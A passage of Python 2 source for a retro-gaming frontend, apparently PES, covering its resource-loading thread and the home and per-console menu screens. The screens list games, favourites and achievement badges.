if row:
consoleId = int(row['console_id'])
except sqlite3.Error, e:
pesExit("Error: %s" % e.args[0], True)
finally:
if con:
con.close()
console = Console(c, consoleId, thegamesdbApiId, extensions, consolePath, command, userPesDb, consoleImg, nocoverart, consoleCoverartDir, emulator)
if configParser.has_option(c, 'ignore_roms'):
for r in configParser.get(c, 'ignore_roms').split(','):
console.addIgnoreRom(r.strip())
if configParser.has_option(c, 'achievement_id'):
console.setAchievementApiId(configParser.get(c, 'achievement_id'))
if configParser.has_option(c, 'require'):
for f in configParser.get(c, 'require').split(','):
console.addRequiredFile(f.strip().replace('%%USERBIOSDIR%%', self.app.config.biosDir))
if console.isNew():
console.save()
self.app.consoles.append(console)
i += 1
self.progress = 32 + (16 * (i / supportedConsoleTotal))
except ConfigParser.NoOptionError as e:
logging.error('PESLoadingThread.run: error parsing config file %s: %s' % (userConsolesConfigFile, e.message))
self.done = True
self.app.exit(1)
return
except ValueError as e:
logging.error('PESLoadingThread.run: error parsing config file %s: %s' % (userConsolesConfigFile, e.message))
self.done = True
self.app.exit(1)
return
self.progress = 48
self.status = "Loading timezone info..."
process = Popen(self.app.config.listTimezonesCommand, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = process.communicate()
if process.returncode != 0:
logging.error("PESLoadingThread.run: could not get time zones")
logging.error(stderr)
else:
for l in stdout.split("\n")[:-1]:
self.app.timezones.append(l)
logging.debug("PESLoadingThread.run: loaded %d timezones" % len(self.app.timezones))
process = Popen(self.app.config.getTimezoneCommand, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = process.communicate()
if process.returncode != 0:
logging.error("PESLoadingThread.run: could not get current time zone!")
logging.error(stderr)
else:
self.app.currentTimezone = stdout[:-1]
logging.debug("PESLoadingThread.run: current timezone is: %s" % self.app.currentTimezone)
self.progress = 64
self.status = "Loading surfaces..."
self.app.initSurfaces()
self.progress = 80
self.status = "Preparing screens..."
self.app.initScreens()
self.progress = 100
self.status = "Complete!"
time.sleep(0.1)
pes.event.pushPesEvent(pes.event.EVENT_RESOURCES_LOADED)
logging.debug("PESLoadingThread.run: %d complete" % self.progress)
self.done = True
return
class Screen(object):
def __init__(self, app, renderer, title, menu, menuRect, screenRect):
super(Screen, self).__init__()
self.title = title
self.app = app
self.renderer = renderer
self.menu = menu
self.menuRect = menuRect
self.screenRect = screenRect
self.menuActive = True
self.justActivated = False
self.__menuMargin = 5
self.__menuTopMargin = 10
self.__menuItemChanged = False
self.screenMargin = 10
self.wrap = self.screenRect[2] - (self.screenMargin * 2)
self.__uiObjects = []
if self.menu:
self.menu.setSelected(0)
self.__menuList = self.addUiObject(List(self.renderer, self.__menuMargin + self.menuRect[0], self.menuRect[1] + self.__menuTopMargin, self.menuRect[2] - (self.__menuMargin * 2), self.menuRect[3] - (self.menuRect[1] + self.__menuTopMargin), self.menu, self.app.menuFont, self.app.menuTextColour, self.app.menuSelectedTextColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_DISABLED, labelMargin=0))
self.__menuList.setFocus(True)
def addUiObject(self, o):
if o not in self.__uiObjects:
self.__uiObjects.append(o)
return o
def draw(self):
if self.menu:
self.drawMenu()
self.drawScreen()
def drawMenu(self):
sdl2.sdlgfx.boxRGBA(self.renderer, self.menuRect[0], self.menuRect[1], self.menuRect[0] + self.menuRect[2], self.menuRect[1] + self.menuRect[3], self.app.menuBackgroundColour.r, self.app.menuBackgroundColour.g, self.app.menuBackgroundColour.b, 255)
self.__menuList.draw()
def drawScreen(self):
sdl2.sdlgfx.boxRGBA(self.renderer, self.screenRect[0], self.screenRect[1], self.screenRect[0] + self.screenRect[2], self.screenRect[1] + self.screenRect[3], self.app.backgroundColour.r, self.app.backgroundColour.g, self.app.backgroundColour.b, 255)
def isBusy(self):
return False
def processEvent(self, event):
if self.menuActive and event.type == sdl2.SDL_KEYDOWN:
if event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER:
self.menu.getSelectedItem().trigger()
self.setMenuActive(False)
self.__menuList.setFocus(False)
self.justActivated = True
else:
self.justActivated = False
self.__menuList.processEvent(event)
elif not self.menuActive:
self.justActivated = False
def removeUiObject(self, o):
if o in self.__uiObjects:
self.__uiObjects.remove(o)
def select(self, index):
if self.menu:
self.menu.setSelected(index, True)
def setMenuActive(self, active):
if self.menu:
self.menuActive = active
self.__menuList.setFocus(active)
logging.debug("Screen.setMenuActive: \"%s\" activate state is now: %s" % (self.title, self.menuActive))
def stop(self):
uiObjectLen = len(self.__uiObjects)
if uiObjectLen > 0:
logging.debug("Screen.stop: Destroying %d UI objects..." % uiObjectLen)
for o in self.__uiObjects:
o.destroy()
class ConsoleScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect, console):
super(ConsoleScreen, self).__init__(app, renderer, console.getName(), Menu([
MenuItem("Favourites"),
MenuItem("Recently Played"),
MenuItem("Most Played"),
MenuItem("Recently Added"),
MenuItem("Have Badges"),
MenuItem("All")
]),
menuRect, screenRect)
self.__console = console
self.__consoleName = console.getName()
self.menu.setSelected(0)
self.__thumbXGap = 20
self.__thumbYGap = 10
self.__showThumbs = 10
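# divide the usable screen width evenly between the thumbnails, allowing for the horizontal gap between each one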
self.__desiredThumbWidth = int((screenRect[2] - (self.__showThumbs * self.__thumbXGap)) / self.__showThumbs)
# read the placeholder cover art's dimensions, then release the file handle
img = Image.open(console.getNoCoverArtImg())
self.__noCoverArtWidth, self.__noCoverArtHeight = img.size
img.close()
self.__thumbRatio = float(self.__noCoverArtHeight) / float(self.__noCoverArtWidth)
self.__thumbWidth = self.__desiredThumbWidth
self.__thumbHeight = int(self.__thumbRatio * self.__thumbWidth)
self.__consoleTexture = None
self.__titleLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], "%s: %s" % (self.__consoleName, self.menu.getSelectedItem().getText()),
self.app.titleFont, self.app.textColour, fixedWidth=self.wrap))
self.__noGamesFoundLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__titleLabel.y + (self.__titleLabel.height * 2), "No games found.", self.app.bodyFont, self.app.textColour))
self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__titleLabel.y + (self.__titleLabel.height * 2), " ", self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__allGamesList = None
self.__recentlyAddedGamesList = None
self.__favouritesList = None
self.__recentlyPlayedList = None
self.__mostPlayedList = None
self.__achievementsList = None
self.__gameInfoLabel = None
self.__gameOverviewLabel = None
self.__previewThumbnail = None
self.__searchLabel = None # referenced by the leftover "Search" branch in processEvent
self.__listX = self.screenRect[0] + self.screenMargin
self.__listY = self.__titleLabel.y + (self.__titleLabel.height * 2)
self.__listWidth = 300
self.__listHeight = self.screenRect[1] + self.screenRect[3] - self.__listY - self.screenMargin
self.__previewThumbnailX = self.__listX + self.__listWidth
self.__previewThumbnailWidth, self.__previewThumbnailHeight = scaleImage((self.__noCoverArtWidth, self.__noCoverArtHeight), (self.screenRect[0] + self.screenRect[2] - self.__previewThumbnailX - 50, int((self.screenRect[3] - self.screenRect[1]) / 2)))
self.__previewThumbnailX += int((((self.screenRect[0] + self.screenRect[2]) - self.__previewThumbnailX) / 2) - (self.__previewThumbnailWidth / 2))
self.__previewThumbnailY = self.__listY
self.__gameInfoLabelX = self.__listX + self.__listWidth + 50
self.__gameInfoLabelY = self.__previewThumbnailY + self.__previewThumbnailHeight + 10
self.__gameInfoLabelWidth = self.screenRect[0] + self.screenRect[2] - self.__gameInfoLabelX - 5
self.__gameInfoLabelHeight = 6 * sdl2.sdlttf.TTF_FontHeight(self.app.bodyFont)
self.__gameInfoLabel = self.addUiObject(Label(self.renderer, self.__gameInfoLabelX, self.__gameInfoLabelY, " ", self.app.bodyFont, self.app.textColour, fixedWidth=self.__gameInfoLabelWidth,
fixedHeight=self.__gameInfoLabelHeight, bgColour=self.app.menuTextColour, bgAlpha=50))
self.__gameOverviewLabelX = self.__gameInfoLabelX
self.__gameOverviewLabelY = self.__gameInfoLabelY + self.__gameInfoLabelHeight
self.__gameOverviewLabel = self.addUiObject(Label(self.renderer, self.__gameInfoLabelX, self.__gameOverviewLabelY, " ", self.app.bodyFont, self.app.textColour, fixedWidth=self.__gameInfoLabelWidth, fixedHeight=(self.screenRect[1] + self.screenRect[3] - self.__gameOverviewLabelY - self.screenMargin), autoScroll=True, bgColour=self.app.menuTextColour, bgAlpha=50))
self.__recentlyAddedThumbPanel = None
self.__recentlyPlayedThumbPanel = None
self.__mostPlayedThumbPanel = None
self.__favouriteThumbPanel = None
self.__achievementsThumbPanel = None
self.__allGamesThumbPanel = None
self.refreshNeeded = True
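# defer the expensive content load until the screen is first drawn (see drawScreen)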
#self.refresh()
logging.debug("ConsoleScreen.init: initialised for %s" % self.__consoleName)
def __createMenu(self, games):
menu = Menu([])
for g in games:
m = GameMenuItem(g, False, True, self.__playGame, g)
m.toggle(g.isFavourite())
menu.addItem(m)
return menu
def __createPreviewThumbnail(self, game):
if self.__previewThumbnail == None:
self.__previewThumbnail = self.addUiObject(Thumbnail(self.renderer, self.__previewThumbnailX, self.__previewThumbnailY, self.__previewThumbnailWidth, self.__previewThumbnailHeight, game, self.app.bodyFont, self.app.textColour, False))
def drawScreen(self):
if self.refreshNeeded:
self.refresh()
if self.__consoleTexture == None:
self.__consoleTexture = sdl2.SDL_CreateTextureFromSurface(self.renderer, self.app.consoleSurfaces[self.__consoleName])
sdl2.SDL_SetTextureAlphaMod(self.__consoleTexture, CONSOLE_TEXTURE_ALPHA)
sdl2.SDL_RenderCopy(self.renderer, self.__consoleTexture, None, sdl2.SDL_Rect(self.screenRect[0], self.screenRect[1], self.screenRect[2], self.screenRect[3]))
self.__titleLabel.draw()
selectedText = self.menu.getSelectedItem().getText()
if self.menuActive:
if selectedText == "Recently Added":
self.__recentlyAddedThumbPanel.draw()
elif selectedText == "Recently Played":
if self.__recentlyPlayedGamesTotal > 0 and self.__recentlyPlayedThumbPanel:
self.__recentlyPlayedThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Favourites":
if self.__favouriteGamesTotal > 0 and self.__favouriteThumbPanel:
self.__favouriteThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Have Badges":
if self.__gamesWithAchievementsTotal > 0 and self.__achievementsThumbPanel:
self.__achievementsThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Most Played":
if self.__mostPlayedGamesTotal > 0 and self.__mostPlayedThumbPanel:
self.__mostPlayedThumbPanel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "All":
#self.__descriptionLabel.draw()
self.__allGamesThumbPanel.draw()
else:
if selectedText == "Recently Added":
self.__recentlyAddedGamesList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
elif selectedText == "Recently Played":
if self.__recentlyPlayedGamesTotal > 0:
self.__recentlyPlayedList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Favourites":
if self.__favouriteGamesTotal > 0:
self.__favouritesList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Have Badges":
if self.__gamesWithAchievementsTotal > 0:
self.__achievementsList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "Most Played":
if self.__mostPlayedGamesTotal > 0:
self.__mostPlayedList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
else:
self.__noGamesFoundLabel.draw()
elif selectedText == "All":
self.__allGamesList.draw()
self.__previewThumbnail.draw()
self.__gameInfoLabel.draw()
self.__gameOverviewLabel.draw()
def __getGameInfoText(self, game):
lastPlayed = "N/A"
playCount = game.getPlayCount()
if playCount > 0:
lastPlayed = game.getLastPlayed("%d/%m/%Y")
achievementInfo = "N/A"
if self.app.retroAchievementConn and self.app.achievementUser and game.hasAchievements():
achievementGame = self.app.achievementUser.getGame(game.getAchievementApiId())
achievementInfo = "%d%% complete, %d points" % (achievementGame.getPercentComplete(), achievementGame.getUserPointsTotal())
return "File name: %s\nReleased: %s\nPlay Count: %d\nLast Played: %s\nSize: %s\nBadges: %s\nOverview:" % (os.path.basename(game.getPath()), game.getReleased("%d/%m/%Y"), playCount, lastPlayed, game.getSize(True), achievementInfo)
def __playGame(self, game):
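# route games with achievements through the Play screen so badge progress is shown before launch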
if self.app.retroAchievementConn and self.app.achievementUser and game.hasAchievements():
self.app.screens["Play"].setGame(game)
self.app.setScreen("Play")
else:
self.app.playGame(game)
def processEvent(self, event):
super(ConsoleScreen, self).processEvent(event)
if self.menuActive:
if event.type == sdl2.SDL_KEYDOWN and (event.key.keysym.sym == sdl2.SDLK_UP or event.key.keysym.sym == sdl2.SDLK_DOWN or event.key.keysym.sym == sdl2.SDLK_BACKSPACE):
selectedText = self.menu.getSelectedItem().getText()
self.__titleLabel.setText("%s: %s" % (self.__consoleName, selectedText))
if selectedText == "All":
self.__descriptionLabel.setText("Browse all %d games." % self.__console.getGameTotal(), True)
elif selectedText == "Search":
self.__descriptionLabel.setText("Search for games here.", True)
if self.__searchLabel:
self.__searchLabel.setFocus(False)
self.__searchLabel.setVisible(False)
else:
if event.type == sdl2.SDL_KEYUP:
selectedText = self.menu.getSelectedItem().getText()
if selectedText == "All" and self.__allGamesList:
self.__allGamesList.processEvent(event)
elif selectedText == "Recently Added" and self.__recentlyAddedGamesList:
self.__recentlyAddedGamesList.processEvent(event)
elif selectedText == "Most Played" and self.__mostPlayedList:
self.__mostPlayedList.processEvent(event)
elif selectedText == "Recently Played" and self.__recentlyPlayedList:
self.__recentlyPlayedList.processEvent(event)
elif selectedText == "Favourites" and self.__favouritesList:
self.__favouritesList.processEvent(event)
elif selectedText == "Have Badges" and self.__achievementsList:
self.__achievementsList.processEvent(event)
elif event.type == sdl2.SDL_KEYDOWN:
selectedText = self.menu.getSelectedItem().getText()
if self.justActivated and (event.key.keysym.sym == sdl2.SDLK_RETURN or event.key.keysym.sym == sdl2.SDLK_KP_ENTER):
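# the list for each view is created lazily the first time the user activates it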
if selectedText == "All" and self.__allGamesList == None:
self.__allGamesList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__allGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__allGamesList.setFocus(True)
self.__allGamesList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__allGames[0]))
self.__gameOverviewLabel.setText(self.__allGames[0].getOverview())
self.__createPreviewThumbnail(self.__allGames[0])
elif selectedText == "Recently Added" and self.__recentlyAddedGamesList == None:
self.__recentlyAddedGamesList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__recentlyAddedGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__recentlyAddedGamesList.setFocus(True)
self.__recentlyAddedGamesList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__recentlyAddedGames[0]))
self.__gameOverviewLabel.setText(self.__recentlyAddedGames[0].getOverview())
self.__createPreviewThumbnail(self.__recentlyAddedGames[0])
elif selectedText == "Most Played" and self.__mostPlayedList == None:
if self.__mostPlayedGamesTotal > 0:
self.__mostPlayedList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__mostPlayedGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__mostPlayedList.setFocus(True)
self.__mostPlayedList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__mostPlayedGames[0]))
self.__gameOverviewLabel.setText(self.__mostPlayedGames[0].getOverview())
self.__createPreviewThumbnail(self.__mostPlayedGames[0])
elif selectedText == "Recently Played" and self.__recentlyPlayedList == None:
if self.__recentlyPlayedGamesTotal > 0:
self.__recentlyPlayedList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__recentlyPlayedGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__recentlyPlayedList.setFocus(True)
self.__recentlyPlayedList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__recentlyPlayedGames[0]))
self.__gameOverviewLabel.setText(self.__recentlyPlayedGames[0].getOverview())
self.__createPreviewThumbnail(self.__recentlyPlayedGames[0])
elif selectedText == "Favourites" and self.__favouritesList == None:
if self.__favouriteGamesTotal > 0:
self.__favouritesList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__favouriteGames), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__favouritesList.setFocus(True)
self.__favouritesList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__favouriteGames[0]))
self.__gameOverviewLabel.setText(self.__favouriteGames[0].getOverview())
self.__createPreviewThumbnail(self.__favouriteGames[0])
elif selectedText == "Have Badges" and self.__achievementsList == None:
if self.__gamesWithAchievementsTotal > 0:
self.__achievementsList = self.addUiObject(List(self.renderer, self.__listX, self.__listY, self.__listWidth, self.__listHeight, self.__createMenu(self.__gamesWithAchievements), self.app.bodyFont, self.app.textColour, self.app.textColour, self.app.menuSelectedBgColour, self.app.menuTextColour, List.SCROLLBAR_AUTO, True, False))
self.__achievementsList.setFocus(True)
self.__achievementsList.addListener(self)
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__gamesWithAchievements[0]))
self.__gameOverviewLabel.setText(self.__gamesWithAchievements[0].getOverview())
self.__createPreviewThumbnail(self.__gamesWithAchievements[0])
else:
if selectedText == "All":
self.__allGamesList.processEvent(event)
elif selectedText == "Recently Added":
self.__recentlyAddedGamesList.processEvent(event)
elif selectedText == "Favourites" and self.__favouritesList:
self.__favouritesList.processEvent(event)
elif selectedText == "Most Played" and self.__mostPlayedList:
self.__mostPlayedList.processEvent(event)
elif selectedText == "Recently Played" and self.__recentlyPlayedList:
self.__recentlyPlayedList.processEvent(event)
elif selectedText == "Have Badges" and self.__achievementsList:
self.__achievementsList.processEvent(event)
def processListEvent(self, uiList, eventType, item):
if eventType == List.LISTEN_ITEM_SELECTED:
if self.__previewThumbnail:
game = item.getGame()
self.__previewThumbnail.setGame(game)
self.__gameInfoLabel.setText(self.__getGameInfoText(game))
self.__gameOverviewLabel.setText(game.getOverview())
if eventType == List.LISTEN_ITEM_TOGGLED:
g = item.getGame()
g.setFavourite(item.isToggled())
g.save()
self.__updateFavourites()
def refresh(self):
logging.debug("ConsoleScreen.refresh: reloading content for %s..." % self.__consoleName)
start = time.time()
# all games
self.__allGames = self.__console.getGames()
self.__allGamesTotal = len(self.__allGames)
if self.__allGamesList:
self.__allGamesList.setMenu(self.__createMenu(self.__allGames))
if self.__allGamesThumbPanel:
self.__allGamesThumbPanel.setGames(self.__allGames[0:self.__showThumbs])
else:
self.__allGamesThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__allGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# recently added
recentlyAddedGameIds = self.__console.getRecentlyAddedGameIds()
self.__recentlyAddedGamesTotal = len(recentlyAddedGameIds)
self.__recentlyAddedGames = []
for i in recentlyAddedGameIds:
self.__recentlyAddedGames.append(self.__console.getGame(i))
if self.__recentlyAddedGamesList:
self.__recentlyAddedGamesList.setMenu(self.__createMenu(self.__recentlyAddedGames))
if self.__recentlyAddedThumbPanel:
self.__recentlyAddedThumbPanel.setGames(self.__recentlyAddedGames[0:self.__showThumbs])
else:
self.__recentlyAddedThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__recentlyAddedGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# most played
mostPlayedGameIds = self.__console.getMostPlayedGameIds()
self.__mostPlayedGamesTotal = len(mostPlayedGameIds)
self.__mostPlayedGames = []
if self.__mostPlayedGamesTotal > 0:
for i in mostPlayedGameIds:
self.__mostPlayedGames.append(self.__console.getGame(i))
if self.__mostPlayedList:
self.__mostPlayedList.setMenu(self.__createMenu(self.__mostPlayedGames))
if self.__mostPlayedThumbPanel:
self.__mostPlayedThumbPanel.setGames(self.__mostPlayedGames[0:self.__showThumbs])
else:
self.__mostPlayedThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__mostPlayedGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# recently played
recentlyPlayedGameIds = self.__console.getRecentlyPlayedGameIds()
self.__recentlyPlayedGamesTotal = len(recentlyPlayedGameIds)
self.__recentlyPlayedGames = []
if self.__recentlyPlayedGamesTotal > 0:
for i in recentlyPlayedGameIds:
self.__recentlyPlayedGames.append(self.__console.getGame(i))
if self.__recentlyPlayedList:
self.__recentlyPlayedList.setMenu(self.__createMenu(self.__recentlyPlayedGames))
if self.__recentlyPlayedThumbPanel:
self.__recentlyPlayedThumbPanel.setGames(self.__recentlyPlayedGames[0:self.__showThumbs])
else:
self.__recentlyPlayedThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__recentlyPlayedGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
# games with achievements
gamesWithAchievementIds = self.__console.getGamesWithAchievementIds()
self.__gamesWithAchievementsTotal = len(gamesWithAchievementIds)
self.__gamesWithAchievements = []
if self.__gamesWithAchievementsTotal > 0:
for i in gamesWithAchievementIds:
self.__gamesWithAchievements.append(self.__console.getGame(i))
if self.__achievementsList:
self.__achievementsList.setMenu(self.__createMenu(self.__gamesWithAchievements))
if self.__achievementsThumbPanel:
self.__achievementsThumbPanel.setGames(self.__gamesWithAchievements[0:self.__showThumbs])
else:
self.__achievementsThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__gamesWithAchievements[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
self.__updateFavourites()
self.refreshNeeded = False
logging.debug("ConsoleScreen.__refresh: time taken = %0.02fs" % (time.time() - start))
def __updateFavourites(self):
self.__favouriteGames = []
favouriteGameIds = self.__console.getFavouriteIds()
self.__favouriteGamesTotal = len(favouriteGameIds)
logging.debug("ConsoleScreen.__updateFavourites: favourite total: %d" % self.__favouriteGamesTotal)
if self.__favouriteGamesTotal > 0:
for i in favouriteGameIds:
self.__favouriteGames.append(self.__console.getGame(i))
if self.__favouritesList:
self.__favouritesList.setMenu(self.__createMenu(self.__favouriteGames))
if self.__favouriteThumbPanel:
self.__favouriteThumbPanel.setGames(self.__favouriteGames[0:self.__showThumbs])
else:
self.__favouriteThumbPanel = self.addUiObject(ThumbnailPanel(self.renderer, self.__listX, self.__listY, self.screenRect[2] - self.screenMargin, self.__favouriteGames[0:self.__showThumbs], self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs))
if self.menu.getSelectedItem().getText() == "Favourites":
self.__gameInfoLabel.setText(self.__getGameInfoText(self.__favouriteGames[0]))
self.__gameOverviewLabel.setText(self.__favouriteGames[0].getOverview())
if self.__previewThumbnail != None:
self.__previewThumbnail.setGame(self.__favouriteGames[0])
else:
if self.__favouritesList:
self.__favouritesList.destroy()
self.__favouritesList = None
def stop(self):
super(ConsoleScreen, self).stop()
logging.debug("ConsoleScreen.stop: deleting textures for %s..." % self.__consoleName)
if self.__consoleTexture:
sdl2.SDL_DestroyTexture(self.__consoleTexture)
class HomeScreen(Screen):
def __init__(self, app, renderer, menuRect, screenRect):
super(HomeScreen, self).__init__(app, renderer, "Home", Menu([MenuItem("Home")]), menuRect, screenRect)
#super(HomeScreen, self).__init__(app, renderer, "Home", Menu([MenuItem("Achievements", False, False, app.setScreen, "Achievements")]), menuRect, screenRect)
for c in self.app.consoles:
if c.getGameTotal() > 0:
self.menu.addItem(ConsoleMenuItem(c, False, False, self.__loadConsoleScreen, c))
if self.app.config.kodiCommand:
self.menu.addItem(MenuItem("Kodi", False, False, self.app.runKodi))
self.menu.addItem(MenuItem("Settings", False, False, self.app.setScreen, "Settings"))
self.menu.addItem(MenuItem("Reload", False, False, self.app.reload))
self.menu.addItem(MenuItem("Reboot", False, False, self.app.reboot))
self.menu.addItem(MenuItem("Power Off", False, False, self.app.shutdown))
self.menu.addItem(MenuItem("Exit", False, False, self.app.exit, 0, True))
self.__thumbXGap = 20
self.__thumbYGap = 10
self.__showThumbs = 10
self.__desiredThumbWidth = int((screenRect[2] - (self.__showThumbs * self.__thumbXGap)) / self.__showThumbs)
self.__consoleTexture = None
self.__consoleSelected = False
self.__consoleName = None
self.__headerLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], "Welcome to PES!", self.app.titleFont, self.app.textColour))
#self.__headerLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.screenRect[1], "Achievements", self.app.titleFont, self.app.textColour))
self.__gamesAdded = self.app.getGameTotal() > 0
self.__noGamesAddedWelcomeText = "Before you can start playing any games, please add some to PES and then go to \"Update Games\" under the \"Settings\" screen.\n\nNote: if you sign up for an account at www.retroachievements.org and enter your details into your pes.ini file, PES will show your achievements here.\n\nFor help please visit http://pes.mundayweb.com."
self.__gamesAddedWelcomeText = "Please select an item from the menu on the left.\n\nNote: if you sign up for an account at www.retroachievements.org and enter your details into your pes.ini file, PES will show your achievements here.\n\nFor help please visit http://pes.mundayweb.com."
if self.__gamesAdded:
self.__welcomeText = self.__gamesAddedWelcomeText
else:
self.__welcomeText = self.__noGamesAddedWelcomeText
self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), self.__welcomeText, self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
#self.__descriptionLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), "BLAH", self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__recentlyAddedText = "Recently Added"
self.__recentlyAddedLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), self.__recentlyAddedText, self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__recentlyPlayedLabel = self.addUiObject(Label(self.renderer, self.screenRect[0] + self.screenMargin, self.__headerLabel.y + (self.__headerLabel.height * 2), "Recently Played", self.app.bodyFont, self.app.textColour, fixedWidth=self.wrap))
self.__recentlyAddedThumbPanels = {}
self.__recentlyPlayedThumbPanels = {}
self.__badgePanels = []
self.__initBadges = True # hack to make sure badges are not initialised inside the PES loading thread
logging.debug("HomeScreen.init: initialised")
def __doNothing(self):
self.setMenuActive(True)
def drawScreen(self):
super(HomeScreen, self).drawScreen()
self.__headerLabel.draw()
if self.__consoleSelected:
sdl2.SDL_RenderCopy(self.renderer, self.__consoleTexture, None, sdl2.SDL_Rect(self.screenRect[0], self.screenRect[1], self.screenRect[2], self.screenRect[3]))
self.__recentlyAddedLabel.draw()
if self.__consoleName in self.__recentlyAddedThumbPanels:
self.__recentlyAddedThumbPanels[self.__consoleName].draw()
if self.__consoleName in self.__recentlyPlayedThumbPanels:
self.__recentlyPlayedThumbPanels[self.__consoleName].draw()
self.__recentlyPlayedLabel.draw()
elif self.menu.getSelectedItem().getText() == "Home":
if self.__initBadges:
self.updateRecentBadges()
self.__initBadges = False
self.__descriptionLabel.draw()
for p in self.__badgePanels:
p.draw()
else:
self.__descriptionLabel.draw()
def __loadConsoleScreen(self, console):
screenName = "Console %s" % console.getName()
self.app.screens[screenName].refresh()
self.app.setScreen(screenName)
def loadTextures(self):
logging.debug("HomeScreen.loadTextures: pre-loading textures for thumb panels...")
for console in self.app.consoles:
if console.getGameTotal() > 0:
games = console.getRecentlyAddedGames(0, self.__showThumbs)
if len(games) > 0:
t = ThumbnailPanel(self.renderer, self.screenRect[0] + self.screenMargin, self.__recentlyAddedLabel.y + self.__recentlyAddedLabel.height + self.__thumbYGap, self.screenRect[2] - self.screenMargin, games, self.app.smallBodyFont, self.app.textColour, self.app.menuSelectedBgColour, self.__thumbXGap, True, self.__showThumbs)
t.loadTextures()
self.__recentlyAddedThumbPanels[console.getName()] = self.addUiObject(t)
games = console.getRecentlyPlayedGames(0, self.__showThumbs)
if len(games) > 0:
